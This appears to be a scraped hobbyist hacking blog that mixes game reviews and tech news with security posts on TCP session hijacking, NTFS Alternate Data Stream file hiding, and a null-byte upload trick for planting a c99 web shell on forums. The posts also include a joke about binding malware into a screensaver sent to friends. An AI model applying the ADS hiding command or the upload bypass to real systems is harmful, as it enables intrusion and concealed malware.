King of Fighters 12,an honest review

Lets go back to early 90’s Street Fighter series is churning arcades up there and fans of fighting games have gone berserk with the offering of Capcom,enter SNK  King of Fighters is born,and the series originally stood as the top contender against the legendary Street Fighter series.With the launch of King of Fighters 12,I have been enthusiastic enough to give it a try as I m a fighting game maniac,and its time to test if it matches the expectations of fans and critics alike.

Prologue

SNK's King of Fighters has been touted as the reboot of the series,to restore it to its former glory,this theme emerged from the game’s brand new style of characters and sprites which contribute to the overall visual overhaul of the series in ages,and to do what Street Fighter 4 did to the Street Fighter series.However to my dismay,this game is a disappointment.This 3 on 3, 2D fighter sports a fairly solid fighting engine much like the older KOF’s but everything surrounding that engine is either lackluster or broken. Or both. It's a shame that the one game aimed at the rebirth of a dying franchise has been rushed and lacks developer effort.

Characters

As we all know,the characters are the core of the fighting game,after all they provide an identity to the game.KOF sports all the nostalgic and series stars –Terry Bogard,Kim Kaphwan,Iori yagami and more ..however series iconic Mai Shirunai is missing (I miss her hot figure :P).

Gameplay,Graphics and presentation

It follows the old school rules of the series,every character has a Light Punch, Heavy Punch, Light Kick and Heavy Kick. These form the basic attacks and you can combine them to execute all orts of complex combos. By Pressing both Light Punch and Light Kick you can evade an attack while you can execute a by hitting both punch buttons.You can block heavy attacks by Hitting both heavy attacks which can knock your opponent away and give your fighter some room to breathe.You can parry an incoming strike by hitting heavies while holding D-Pad which will perform a Guard Attack.

As with all fighting games,every character has his set of specials and super moves.one of new systems KOF introduces is the Critical Counter system. Fill up your gauge during a sparring session and, once filled, counter your opponent's attack with a Heavy Punch or Heavy Kick,which will activate a special combo state where you can release all sorts of combos and chain attacks together.It was a real blast (I like real damage).

When it comes to selecting stages,I was disappointed with the fact that there are only six stages to choose from, two of which are just day/night variations of each other. And there is just one soundtrack for the whole game !!!! Cant they tune it all together ?

The core battle system in KOFXII is faithful to the series however it feels bland when compared to Street Fighter 4,BlazBlue and Guilty Gear series.The new character animation are praiseworthy,but there are resolution issues,as they seem to be pixilated when the combat starts.

Modes

KOFXII can be quite fun when you mash it out with your friend locally,but it has got some serious issues on both the PS3 and 360. No unlockables,just 2 modes –arcade and multiplayer,no story and survival modes..well,WHAT WERE THEY THINKING?!! The game navigation system is broken, For example, you can't back out of the character selection screen once you dive in, the game loads at odd points during menu navigation and the training mode lacks a "reset" button.

Multiplayer

LAG LAG LAG..that's what I can describe the KOF12 multiplayer as of now,the online multiplayer is unplayable.They released patches but they too suffered from horrendous lags,and in short,it ruins the multiplayer experience as most player nowadays match their skills online. Also the patch they made me (forcefully and I M SERIOUS !!!) to install was an odd 700+ MB file that installs and updates game data which you would normally install from the disc. one more act of dev-foolishness..

Epilogue

King of Fighters XII is fun to play when you're fighting a buddy locally, but everything else about the game is seriously lacking. This is not rebirth you have been  waiting for and SNK was hoping for, as just smoothly animated sprites can't make a lackluster game with broken online support a topdog.I would rather recommend you to get your hands on Blazblue,play Street Fighter 4 and wait for Tekken 6 if you are a hardcore fighting fan.

Final Score – 27/40

Posted by XERO .ALL RIGHTS RESERVED.

 

Technorati Tags: gaming,consumer,reviews,technology news,rdhacker,prohack,kof12,king of fighters 12,games,game reviews

read more "King of Fighters 12,an honest review"

Run Resident Evil 4 on PC perfectly

Resident Evil 4 is a legendary game, and that’s not an overestimation. Recently I got the Asian edition of the game and I was violated to see the over the top crappy graphics, bad controls with no mouse support and worse no dynamic lighting. It was a crappy port of an excellent game. Ubisoft ported Capcom's prized baby on PC and I thought they made it like something only monkey's can play.

Ubisoft got the "rave" comments about their port and handled the above issues by releasing a patch which addressed some of the issues posed by the original conversion. However here too they messed it up again by releasing the patch only for European version to my knowledge (please correct me if I m wrong) so most of the diehard fans and gamers (like me) were devoid of the playable port of RE4 even if we had original DVD’s. Also the official patch caused some machines to crash and some saved games to get erased. Overall it showed the carelessness of Capcom and Ubisoft, 2 industry giants who has given us quality games from over a decade.

However, this was not something that cannot be handled by the loyal and large fanbase RE4 commands. Fans of the series modded the game to their likingness and have made their mods available for everyone out their. I played RE using both 3D analyzer and using conventional method, however I would like to share how I did that, how I made it run..its a long run, and be prepared for making some good backups.

You will need-

1. Official RE4 Patch European edition
2. Asian to European Patch
3. Mouse Patch version 2
4. Keyboard patch
5. Lots of time

How to do that -

1. First recognize the version of RE you are using, if it says Resident Evil 4 on main screen then you are lucky, you have the European version of the game, skip to the step 5 then, and if in the other case if it says Biohazard 4,then get ready for some hardships though.
2. Install the game as usual.
3. Download the unofficial Asian to European patch and install it, make sure to backup your main game EXE files first.
4. open registry editor and navigate to -
   • HKEY_Local_Machine/software/CAPCOM/Biohazard 4
   • And rename it to -
   • HKEY_Local_Machine/software/CAPCOM/Resident Evil 4
5. Now Download the official European patch from Ubisoft and install it.
6. Now download the Mouse patch version 2.0 and Keyboard patch and extract all the files to the install directory. Double click the patch files and restart your PC.
7. You are now good to go..Heed my advice, play the game like its meant to be, get a good controller, grab a cup of coffee and enjoy the game.

 

Posted by XERO.ALL RIGHTS RESERVED.

Technorati Tags: resident evil 4,capcom,rdhacker,prohack,gaming,tutorials,hacking,console,modding,re4 pc,how to

read more "Run Resident Evil 4 on PC perfectly"

Programs that perform Session Hijacking

Programs that perform Session Hijacking

• There are several programs available that perform session hijacking. Following are a few that belongs to this category:

  • Juggernaut

  • Hunt

  • TTY Watcher

  • IP Watcher

  • T-Sight

There are few programs/source codes available for doing a TCP hijack.

• Juggernaut

• TTY Watcher

• IP Watcher

• T-Sight

• Hunt

Hacking Tool: Juggernaut

• Juggernaut is a network sniffer that can be used to hijack TCP sessions. It runs on Linux Operating systems.

• Juggernaut can be set to watch for all network traffic or it can be given a keyword like password to look out for.

• The main function of this program is to maintain information about various session connections that are occurring on the network.

• The attacker can see all the

  Juggernaut is basically a network sniffer that can also be used to hijack TCP sessions. It runs on Linux and has a Trinux module as well. Juggernaut can be activated to watch all network traffic on the local network.

  For example, Juggernaut can be configured to wait for the login prompt, and then record the network traffic that follows (usually capturing the password). By doing so, this tool can be used to capture certain types of traffic by simply leaving the tool running for a few days, and then the attacker just has to pick up the log file that contains the recorded traffic. This is different than regular network sniffers that record all network traffic making the log files extremely huge (and thus easy to detect).

  However, the main feature of this program is its ability to maintain a connection database. This means an attacker can watch all the TCP based connection made on the local network, and possibly "hijack" the session. After the connection is made, the attacker can watch the entire session (for a telnet session, this means the attacker sees the "playback" of the entire session. This is like actually seeing the telnet window).

  When an active session is watched, the attacker can perform some actions on that connection, besides passively watching it. Juggernaut is capable of resetting the connection (which basically means terminating it), and also hijacking the connection, allowing the attacker to insert commands in the session or even to completely take the session into his hands (resetting connection on the legitimate client). sessions and he can pick a session he wants to hijack.

---Regards,
Amarjit Singh

read more "Programs that perform Session Hijacking"

Sequence Numbers - crucial to hijacking a session

Sequence Numbers

• Sequence Numbers are very important to provide reliable communication but they are also crucial to hijacking a session.

• Sequence numbers are a 32-bit counter, which means the value can be any of over 4 billion possible combinations.

• The sequence numbers are used to tell the receiving machine what order the packets should go in when they are received.

• Therefore an attacker must successfully guess the sequence number to hijack a session.

TCP provides a full duplex reliable stream connection between two end points. A connection is uniquely defined by the IP address of sender, TCP port number of the sender, IP address of the receiver and TCP port number of the receiver.

Every byte that is sent by a host is marked with a sequence number and is acknowledged by the receiver using this sequence number. The sequence number for the first byte sent is computed during the connection opening. It changes for any new connection based on rules designed to avoid reuse of the same sequence number for two different sessions of a TCP connection.

We have sent the increment of sequence number in our discussion of the three way handshake. What happens if the sequence number is predictable? When the TCP sequence is predictable, an attacker can send packets that are forged to appear to come from a trusted computer.

The next step taken was to tighten the OS implementation of TCP and introduce randomness in the ISN. This was done by the use of pseudo-random number generators (PRNGs). PRNGs introduced some randomness when producing ISNs used in TCP connections. However, adding a series of numbers together provided insufficient variance in the range of likely ISN values; thereby allowing an attacker to disrupt or hijack existing TCP connections or spoof future connections against vulnerable TCP/IP stack implementations.

This implied that systems relying on random increments to make ISN numbers harder to guess were still vulnerable to statistical attack. In other words, with the passage of time, even computers choosing random numbers will repeat themselves, because the randomness is based on an internal algorithm that is used by a particular operating system. Once a sequence number has been agreed to, all following data will be the ISN+1. This makes injecting data into the communication stream possible.

Threat

If a sequence number within the receive window is known, an attacker can inject data into the session stream or choose to terminate the connection. If the attacker knows the initial sequence number, he can send a simple packet to inject data or kill the session if he is aware of the number of bytes transmitted in the session this far.

As this is a difficult proposition, the attacker can guess a suitable range of sequence numbers and send out a number of packets into the network with different sequence numbers - but falling within the range. Since the range is known, it is likely that at least one packet will be accepted by the server. This way, the attacker need not send a packet for every sequence number, but resort to sending an appropriate number of packets with sequence numbers a window-size apart. But how does he know how many packets are to be sent?

This is obtained by dividing the range of sequence numbers to be covered by the fraction of the window size that is used as an increment. Why was this possible despite the introduction of PRNGs? The problem lay in the use of increments themselves, random or otherwise, to advance an ISN counter, making statistical guessing practical. The result of this is that remote attackers can perform session hijacking or disruption by injecting a flood of packets with a range of ISN values, one of which may match the expected ISN. The more random the ISNs are, the more difficult it is to carry out these attacks.

---Regards,
Amarjit Singh

read more "Sequence Numbers - crucial to hijacking a session"

Types of session Hijacking

Types of session Hijacking

There are two types of hijacking attacks:

1. Active

   In an active attack, an attacker finds an active session and takes over.

2. Passive

   With a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth.

Session hijacking can be active or passive in nature depending on the degree of involvement of the attacker in the attack. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive attack monitors an ongoing session.

Generally a passive attack uses sniffers on the network allowing the attacker to obtain information such as user id and password so that he can use it later to logon as that user and claim his privileges. Password sniffing is only the simplest attack that can be performed when raw access to a network is obtained. Counters against this attack range from using identification schemes such as one-time password (e.g. skey) to ticketing identification (such as Kerberos). While these may keep sniffing from yielding any productive results, they do not insure the network from an active attack neither as long as the data is neither digitally signed nor encrypted.

In an active attack, the attacker takes over an existing session by either tearing down the connection on one side of the conversation or by actively participating by being the man-in-the-middle. These have been discussed at length under the discussion covering the various steps involved in a session hijack.

This requires the ability to predict the sequence number before the target can respond to the server. Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial sequence number; newer mechanisms use a randomized value for the initial sequence number.

---Regards,
Amarjit Singh

read more "Types of session Hijacking"

Steps in Session Hijacking

1. Tracking the session

2. Desynchronizing the connection

3. Injecting the attacker's packet

How does an attacker go about hijacking a session? The hijack can be broken down into four broad phases.

• Tracking the connection

  The attacker will wait to find a suitable target and host. He use a network sniffer to track the victim and host or identify a suitable user by scanning with a scanning tool such as nmap to find a target with a trivial TCP sequence prediction. This is done to ensure that because the correct sequence and acknowledgement numbers are captured, as packets are checked by TCP through sequence and/or acknowledgement numbers. These will later be used by the attacker in crafting his own packets.

• Desynchronizing the connection

  A desynchronized state is when a connection between the target and host is in the established state; or in a stable state with no data transmission; or the server's sequence number is not equal to the client's acknowledgement number; or the clients sequence number is not equal to the server's acknowledgement number. To desynchronize the connection between the target and host, the sequence number or the acknowledgement number (SEQ/ACK) of the server must be changed. This can be done if null data is sent to the server so that the server's SEQ/ACK numbers will advance; while the target machine will not register such an increment.

  The desynchronizing is preceded by the attacker monitoring the session without interference till an opportune moment, when he will send a large amount of " null data" to the server. This data serves only to change the ACK number on the server and does not affect anything else. The attacker does likewise to the target also. Now both the server and target are desynchronized.

• Resetting the connection

  Another approach is to send a reset flag to the server and tearing down the connection on the server side. This is ideally done in the early setup stage. The goal of the attacker is to break the connection on the server side and create a new one with different sequence number.

  The attacker listens for a SYN/ACK packet from the server to the host. On detecting the packet, he sends an RST to the server and a SYN packet with exactly the same parameters such as port number but a different sequence number. The server on receiving the RST packet, closes connection with the target, but initiates another one based on the SYN packet - with a different sequence number on the same port. Having opened a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this and sends back an ACK packet to the server. Now, the server is in the established state. The target is oblivious to the conversation and has already switched to the established state when it received the first SYN/ACK packet from the server. Now both server and target are in desynchronized but established state.

  This can also be done using a FIN flag, but this will cause the server to respond with an ACK and give away the attack through an ACK storm. This results due to a flaw in this method of hijacking a TCP connection. When receiving an unacceptable packet the host acknowledges it by sending the expected sequence number and using its own sequence number. This packet is itself unacceptable and will generate an acknowledgement packet which in turn will generate an acknowledgement packet, thereby creating a supposedly endless loop for every data packet sent. The mismatch in SEQ/ACK numbers results in excess network traffic with both the server and target trying to verify the right sequence. Since these packets do not carry data they are not retransmitted if the packet is lost. However, since TCP uses IP the loss of a single packet puts an end to the unwanted conversation between the server and target on the network.

  The desynchronizing stage is added in the hijack sequence so that the target host is kept in the dark about the attack. Without desynchronizing, the attacker will still be able to inject data to the server and even keep his identity by spoofing an IP address. However, he will have to put up with the server's response being relayed to the target host as well.

• Injecting the attacker's packet

  Now that the attacker has interrupted the connection between the server and target, he can choose to either inject data into the network or actively participate as the "man in the middle", and pass data from the target to the server, and vice versa, reading and injecting data as he sees fit.

Illustration:

1. Alice opens a telnet session to Bob and starts doing some work.

2. Eve observes the connection between Alice and Bob using a sniffer that is integrated into her hijacking tool. Eve makes a note of Alice's IP address and her hijacking software samples the TCP sequence numbers of the connection between Alice and Bob.

3. Eve launches a DoS attack against Alice to stop Alice doing further work on Bob and to prevent an ACK storm from interfering with her attack.

4. Eve generates spoofed packets with the correct TCP sequence numbers and connects to Bob.

5. Bob thinks that he is still connected to Alice.

6. Alice notices a lack of response from Bob and blames it on the network.

7. Eve finds herself at a root prompt on Bob. She issues some commands to make a backdoor and uses the sniffer to observe the responses from Bob.

8. After covering her tracks, Eve logs out of Bob and ceases the DoS attack against Alice.

9. Alice notices that her connection to Bob has been dropped.

10. Eve uses her backdoor to get directly into Bob.

---Regards,
Amarjit Singh

read more "Steps in Session Hijacking"

Spoofing Vs Hijacking

A spoofing attack is different from a hijack in that an attacker is not actively taking another user offline to perform the attack. he pretends to be another user or machine to gain access.

The early record of a session hijacking is perhaps the Morris Worm episode that affected nearly 6000 computers on the ARPANET in 1988. This was ARPANET's first automated network security incident. Robert T. Morris wrote a program that would connect to another computer, find and use one of several vulnerabilities to copy itself to that second computer, and begin to run the copy of itself at the new location. Both the original code and the copy would then repeat these actions in an infinite loop to other computers on the ARPANET.

Though this has found reference time and again in the context of worms and denial of service, the basic working of the Morris worm was based on the discovery that the security of a TCP/IP connection rested in the sequence numbers and that it was possible to predict them

Blind IP spoofing involves predicting the sequence numbers that the victimized host will send in order to create a connection which appears to originate from the host. Before exploring blind spoofing further, let us take a look at sequence number prediction.

TCP sequence numbers are used to provide flow control and data integrity for TCP sessions. Every byte in a TCP session has a unique sequence number. Moreover, every TCP segment provides the sequence number of the initial byte (ISN), as part of the segment header. The initial sequence number does not start at zero for each session. Instead, the participants specify initial sequence numbers as part of the handshake process-a different ISN for each direction-and begin numbering the bytes sequentially from there.

Blind IP spoofing relies on the attacker's ability to predict sequence numbers as he is unable to sniff the communication between the two hosts by virtue of not being on the same network segment. He cannot spoof a trusted host on a different network and see the reply packets because the packets are not routed back to him. He cannot resort to ARP cache poisoning as well because routers do not route ARP broadcasts across the Internet. As he is not able to see the replies he is forced to anticipate the responses from the victim and prevent the host from sending a RST to the victim. The attacker then injects himself into the communication by predicting what sequence number the remote host is expecting from the victim. This is used extensively to exploit the trust relationships between users and remote machines, these services include NFS, telnet, IRC, etc.

IP spoofing is relatively easy to accomplish. The only pre-requisite on part of the attacker is to have root access on a machine in order to create raw packets. In order to establish a spoofed connection the attacker must know what sequence numbers are being used. Therefore, IP spoofing forces the attacker to have to predict the next sequence number.

The attacker can use "blind" hijacking, to send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net. The attack became famous when Kevin Mitnick used it to hack into Tsutomu Shimomura's computer network. The attack exploited the trust that Shimomura's machines had with the other network. By SYN flooding the trusted host, Mitnick was able to establish a short connection which was then used to gain access through traditional methods.

With Hijacking an attacker is taking over an existing session, which means he is relying on the legitimate user to make a connection and authenticate. Then take over the session.

With IP Spoofing there is no need to guess the sequence number since there is no session currently open with that IP address. The traffic would get back to the attacker only by using source routing. This is where the attacker tells the network how to route the output and input from a session, and he simply sniffs it from the network as it passes by him. Source routing is an IP option used today mainly by network managers to check connectivity. Normally, when an IP packet leaves a system, its path is controlled by the routers and their current configuration. Source routing provides a means to override the control of the routers.

When an attacker uses captured, reverse engineered or brute forced authentication tokens to take over the control of a legitimate user's session while he is in session, the session is said to be hijacked. Due to this attack, the legitimate user may loose access or be deprived of the normal functionality of the session to the attacker, who now acts with the user's privileges.

Most authentications occur at the beginning of a TCP session, this makes it possible for the attacker to gain access to a target machine. A popular method attackers adopt is to use source-routed IP packets. This allows an attacker to become a part of the target - host conversation by deceiving the IP packets to pass through his system. The attacker can also carry out the classic man-in-the-middle attack using a sniffing program to monitor the conversation.

In TCP session hijacking, a familiar aspect of the attacks is the carrying out of a denial-of-service (DoS) attack against the target / host to prevent it from responding by either forcing the machine to crash, or against the network connection to result in a heavy packet loss (e.g. SYN flood).

Session hijacking is even more difficult than IP address spoofing. In session hijacking, John would seek to insert himself into a session that Jane already had set up with \\Mail. John would wait until Jane established a session, then knock her off the air by some means and pick up the session as though he was her. As before, John would send a scripted set of packets to \\Mail but would not be able to see the responses. To do this, he would need to know the sequence number in use when he hijacked the session, which could be calculated knowing the ISN and the number of packets that have been exchanged.

Successful session hijacking is extremely difficult and only possible when a number of factors are under the attacker's control. Knowledge of the ISN would be the least of John's challenges. For instance, he would need a way to knock Jane off the air at will. He also would need a way to know the exact status of Jane's session at the moment he mounted his attack. Both of these require that John have far more knowledge about and control over the session than normally would be possible.

However, IP address spoofing attacks can only be successful if IP addresses are used for authentication. An attacker cannot perform IP address spoofing or session hijacking if per-packet integrity checking is executed. Similarly, neither IP address spoofing nor session hijacking are possible if the session uses encryption such as SSL or PPTP, as the attacker will not be able to participate in the key exchange. Therefore the essential requirements to hijack non-encrypted TCP communications can be listed as: Presence of non-encrypted session oriented traffic, ability to recognize TCP sequence numbers and predict the next sequence number (NSN) and capability to spoof a hosts MAC or IP address to receive communications which are not destined for the attackers host. If the attacker is on the local segment, they can sniff and predict the ISN+1 number and have the traffic routed back to them by poisoning the ARP cache.

---Regards,
Amarjit Singh

read more "Spoofing Vs Hijacking"

Understanding session hijacking

Understanding the flow of message packets over the Internet by dissecting the TCP stack.

Understanding the security issues involved in the use of IPv4 standard

Familiarizing with the basic attacks possible due to the IPv4 standard.

At its simplest level, TCP hijacking relies on the violation of trust relationships between two interacting hosts. Before we go into the details of session hijacking, let us take a look at the TCP stack and the IPv4 protocol, to understand why this attack is possible.

Consider the everyday scenario when you access the Internet with your browser - say IE. IE works at the application layer and accepts the initial datagram to be sent across the Internet. The transport protocol comes into action in the next layer - aptly called the transport layer - and the appropriate protocol header is added to the datagram. Here it is TCP header, as it is the TCP protocol that is being used. This ensures the reliability of data transported over inherently unreliable communication platforms, and also controls many of the aspects in the management and initiation of communication between the two hosts. In the network layer, routers offer the functionality for the datagram to hop from source to the destination, one hop at a time. This also sees the IP header being added to the datagram. The final layer that communicated with the physical hardware is the data link layer. This layer is responsible for the delivery of signals from the source to the destination over a physical communication platform, which in this case is the Ethernet.

Now, the headers are peeled back on reaching the destination to reveal the original datagram. Having understood the TCP stack, let us look at IPv4. The original IPv4 standard needed to address three basic security issues - authentication, integrity and privacy. Authentication was an issue because an attacker could easily spoof an IP address and exploit a session. Spoofing was not restricted to IP address alone, but also extended to MAC addresses in ARP spoofing. An attacker sniffing on a network could sniff packets and carry out simple attacks such as change, delete, reroute, add, forge or divert data. Perhaps the most popular among these attacks is the Man-In-the-Middle attack. An attacker can grab unencrypted traffic from a victim's network-based TCP application, further tampering with the authenticity and integrity of the data before forwarding it on to the unsuspecting target.

---Regards,
Amarjit Singh

read more "Understanding session hijacking"

Create 3d Screensavers with Easy 3D Creator

When it comes to screensavers,I practically hate them,and more even if they are shareware.I hate screensavers when they have a petty watermark on them and  ask me with a nag screen to purchase the full version.But then there were times when I wanted to create my own screensavers,and I did that with Easy 3D Creator.Easy 3D creator is a freeware (which is the best part of it apart from the stunning capabilities it provides) you can create stunning 3D screen savers in a few minutes with no programming. All you just need is a bit of creativity and you have to set some parameters that determine your screen saver's appearance and behavior in step-by-step mode seeing the result immediately.

What does Easy 3D Creator do?

(Shamelessly ripped from official website :P)

1. Create stunning 3D screensavers in a few minutes with no programming!
2. Wrap the screen saver into installer and generate End-User License Agreement for you automatically!
3. You can use a built-in wizard to create a screen saver with your logo or photos with a few mouse clicks!
4. Can generate time-limited shareware screen savers!

What can I do with Easy 3D Creator?

1. Dramatically increase your site's traffic by publishing free 3D screen savers! (which I will not do :P).
2. Amaze your friends with your own artistic 3D screen savers (you can use your photos as textures)!
3. Promote your trade mark!
4. Enjoy creating animated 3D art!
5. Get unlimited number of different screen savers for your desktop for free!
6. Sell shareware screen savers and make some money!
7. ..
8. ..
9. ..
10. And as a Hacker,I will create a good screensaver,bind it with some good binders and encrypt it in a jpeg file and send it to all my friends (seems n00bish but then I cant stop thinking about that :)

You can download it from here -

Download Easy3D creator

 PS: It WONT work on Vista :) Sorry vista dudes.

POSTED BY XERO ALL RIGHTS RESERVED.

Technorati Tags: downloads,reviews,software downloads,rdhacker,prohack,screensaver,easy3d

read more "Create 3d Screensavers with Easy 3D Creator"

5 Hacking Sites for a budding Hacker

Well well well..As I already told you,most of people ask me how to become a hacker,and my usual reply is that I cant make you a hacker,but I can tell you how to be one,and its your interest,your passion,your mindset which will drive you to be one.A hacker evolves from many stages,from the lower level script kiddie to the elite level Guru,one needs to be in constant research to develop their soft and hard skills.I m myself learning a lot,and I would like to share 5 Hacking sites,which you must visit,if you want to be an expert in security.

Phrack

Phrack is the granddaddy of all the hacking sites out there,and is the world’s oldest hacker ezine,by hackers,for hacker. Described by Gordon Fyodor as "the best, and by far the longest running hacker zine” covers deep articles on Hacking and Cracking.A heaven for willing learners,Its articles are worth in gold.

Hacki9

Hakin9 offers an in-depth look at both attack and defense techniques and concentrates on difficult technical issues.Hakin9's target readers are those responsible for IT system security, programmers, security specialists, professional administrators, as well as people taking up security issues in their free time.

Milw0rm

When it comes to getting exploits,few sites are as comprehensive and updated as Milw0rm.Milw0rm provides a one stop platform for almost all security experts along the world to publish their new found exploits on the web so that other can study them for good or worse.

Hack this Site

Wanna test your hacking skills ? Hack This Site puts your skills to an ultimate test as it throws you real life challenges of almost every type,Trust me,If you have it in you,visit and complete its missions and nothing can beat you.

2600

A great collection of articles and podcasts on security,one has to visit 2600 to get a feel what hacking is.

 

I believe you will get better and learn something..

 

Keep Learning

 

POSTED BY XERO ALL RIGHTS RESERVED.

Technorati Tags: hacking,security,internet tips and tricks,links,rdhacker,prohack,hacking sites

read more "5 Hacking Sites for a budding Hacker"

Hide files using Alternate Data Streams

Windows has its share of threats which can be manipulated by a creative hacker.Microsoft incorporated  NTFS system which allowed for  greater data  compression and file storage algorithms but a relatively less known compatibility feature of NTFS, Alternate Data Streams (ADS) provides hackers with a method of hiding root kits or hacker tools on a breached system and allows them to be executed without being detected by the computer user.

However,dangerous it sounds,its amazingly easy to create ADS and require almost little or no skill on the part of hacker.ADS works by storing 2 data streams on single memory location,and simple DOS commands like “type” are used to create an ADS. These commands are used in conjunction with a redirect [>] and colon [:] to fork one file into another.

For instance:  the command

type c:\anyfile.exe > c:\winnt\system32\cmd.exe:anyfile.exe

will fork the common windows command program with an ADS “anyfile.exe.”

Once can hide his/her files using this method and they are almost impossible to detect.

 

POSTED BY XERO .ALL RIGHTS RESERVED.

Technorati Tags: hacking,microsoft,security,tips n tricks,rdhacker,prohack

read more "Hide files using Alternate Data Streams"

The Null Byte Hack

Many web forums have mushroomed on internet and they are setup in a jiffy,so they wont pay much attention to security. An older exploit I m discussing here is  Null Byte exploit.Almost all forums include a picture and avatar uploading system where you can upload your user signatures and avatars.At first look it looks like a normal uploading system,but its a way to upload our own files into forum,or to get into admin area and literally “OWN” the forum. However as this hack is outdated as of now,most have deployed some form of input sanitation to prevent such an attack. Nevertheless,thousands of vulnerable forums do exists even now with even some bigger names crossed here.

How to do exploit it?

In order to exploit this vulnerability,you must input “% 00” (with or without space as the case arises).Now a lot of you are probably asking what the heck it is? Ah well..its the encrypted version of NULL .Its just like the same as we used to exploit the null session in Windows systems.

Now,whenever you will upload a file,you will be asked to specify the directory where the file is located.Now as each file has a particular extension,to signify the kind of file it is.Now what if we can input the “% 00”  at the end of the file ?

The way most forums keep bad files in control and out of forum is by restricting certain extensions such as .exe . php etc. But if we can modify the file and trick the server into thinking that its something else the..

For Example:

C:\webroot\c99.php% 00.jpg

Now when we do this,The operating system will read the file to be uploaded as a PHP file,but the forum server will read it as a .jpg(image) file.And when this happens,you will exploit it to get and upload your files on server,and if you are a bit creative,can access the admin area too.

 

Cheers and Keep Learning

 

POSTED BY XERO ALL RIGHTS RESERVED.

Technorati Tags: hacking,how to,security,tutorials,rdhacker,prohack,vulnerability,exploit,php injection,hack forums

read more "The Null Byte Hack"

Google Chrome OS FAQ

Google has made quite an impact by announcing the Chrome OS and its indeed sending waves though the tech world with some saying the OS signals the beginning of the end for the reign of Microsoft and there are others who say that Google will fall flat on its face and fail. Without more specifics only time will say for sure how big of a splash the OS will really make. Google pledges to release more information regarding the OS later this summer.

This leaves us with lots of questions and few answers. Until Google decides to share more, we'll try to make the best of what we've got in this FAQ.

What is Chrome OS?

Chrome OS is a Linux-based operating system developed by Google which promises to focus on Web applications while integrating a fast and simple interface, based off Google's existing Chrome browser.

Who will use it?

Chrome OS is initially targeted at the netbook market, but Google plans to offer the OS for computers all the way up to full-size desktops. Chrome supports both x86 and ARM architectures, which means that most computers and possibly some mobile devices will be able to run Chrome OS.

What will it look like?

As Google says Chrome OS will run a heavily modified version of Chrome browser so it may resemble chrome with a dock full of apps.

What will become of my computer's desktop?

Nothing..period. When it releases,dual boot it :P The Linux kernel is flexible, so anything's possible.

How will my computer stay secure?

Google claims that it will design Chrome OS's security infrastructure so users "don't have to deal with viruses, malware and security updates." It may or may not be possible since protection measures are itself built into Chrome OS itself.But still flaws are always there.

No computer is truly virus-proof. What will happen if mine gets one?

Good question. Its a common perception that Linux doesn't gets viruses but its only because its a low profile OS and its not targeted as much as Windows,but Chrome will make it an attractive target for virus makers. It's not known what security measures will be in place to save a compromised computer. Probably Linux based Anti-viruses will surface from AV giants like Norton and Kaspersky exclusive to Chrome.

Should I be worried about privacy when entrusting my OS to Google?

This issue has already raised eyebrows by some privacy advocates. Earlier, the company took heat for the way it collected data from Chrome users, and had to make concessions. Until Google can explain how an entire operating system won't be any more intrusive than its existing data-collection practices on the Web, privacy is a valid concern.

Will Chrome OS computers resemble Macs or Windows-based PCs at all?

As Google truly intends for Chrome OS to be a Web-centric OS and their official statement states that Google is "working with multiple OEMs to bring a number of netbooks to market next year." We could see a new line of computers built exclusively for Chrome OS.

Will we see applications exclusive to Chrome OS?

Nah..as the operating system stresses Web apps above all (think it like addons for Mozilla Firefox). Furthermore, Google itself says Web apps "will run not only on Google Chrome OS, but on any standards-based browser on Windows, Mac and Linux thereby giving developers the largest user base of any platform."

Will we see applications that won't run on Chrome OS?

Without a doubt. If Chrome OS could perform every task, it'd be another Windows or OS X, and that's not what Google is trying to do. Don't expect to run Crysis, or Minesweeper.

Will "Favorite Application X" run on Chrome OS?

Depends upon the software dev if it supports the OS or if Google is interested in the program.It's conceivable (till date) that Microsoft won't support a Chrome OS-compatible Office suite, but Google could make things going by building out its Docs suite to match.

When will Chrome OS be released?

It will become available later this year, first for outside programmers to begin tinkering. It'll reach the netbook market in the second half of 2010, according to sources quoted in The New York Times.

 

I m keeping my fingers crossed..Period

 

POSTED BY XERO.ALL RIGHTS RESERVED.

Technorati Tags: google chrome os,google chrome,rdhacker,prohack,technology news,google,what is?

 

read more "Google Chrome OS FAQ"

RE4 Goes Mobile

Yep..My favorite survival horror game of all time (which might be your favorite too..) Resident Evil 4 has been confirmed for Apple iPhone.With 1.5 billion apps   sold through the App Store, Apple iPhone is becoming a new platform for gaming and traditional game developers are beginning to see its potential in a big untapped market. And porting titles like RE4 and MGS4 on iPhone proves it. Resident Evil 4 is one of the most successful and intricately detailed games of all time which pushed a struggling franchise to the pinnacle of its genre.We might be seeing Resident Evil 5 on our mobiles in future.Capcom (The Makers of RE series) announced today through their Twitter feed that Resident Evil 4 is coming to the iPhone at the end of July in Japan to be followed “shortly thereafter” in the rest of the world.

 

 

According to Joystiq, Re4 for the iPhone was apparently put up on the App Store by mistake (?!!) on Monday, then quickly pulled; but not before Japanese iPhone site AppBank was able to get their hands on it.From there,it spread like wildfire and now I m desperately waiting for it to come. No..I dont have an iphone,but I would like to see how it rakes up against its console counterparts.

For the time being,you can judge the game by looking at the video below -

 

Keep gaming

POSTED BY XERO . ALL RIGHTS RESERVED.Source

Technorati Tags: resident evil 4 mobile,capcom,rdhacker,prohack,gaming,technology news,resident evil

read more "RE4 Goes Mobile"

Little Fighter 2 Rockz

Little Fighter 2 has been quite popular in the gaming circles,with gamers battling each other online to match their skills with the best.Little fighter 2 successfully combines the fast gameplay of a fighting game with intuitive controls and has made its place in our hearts since last 10 years.Its a Chibi styled fighting game which combines the retro anime feel and you fight with against computer or a friend,head to head or in a melee.

The controls are simple and customizable to your liking.You can move up, down, left and right; you can attack, defend and jump. That's it. No more, no less, and yet some users claim that Little Fighter can suck them in for hours at time. LF2 is an easy to pickup but hard to master game,and with its almost flat learning curve,it creates great competitive battles. You can invite 4 of your friends to have a brawl on the same keyboard..that's the beauty of this game.There are 10 characters in total but with the code lf2.net on the character select screen the total becomes 23 fighters. There are 9 backgrounds and there are 10 weapons (if you count the beer and the milk as weapons :P).

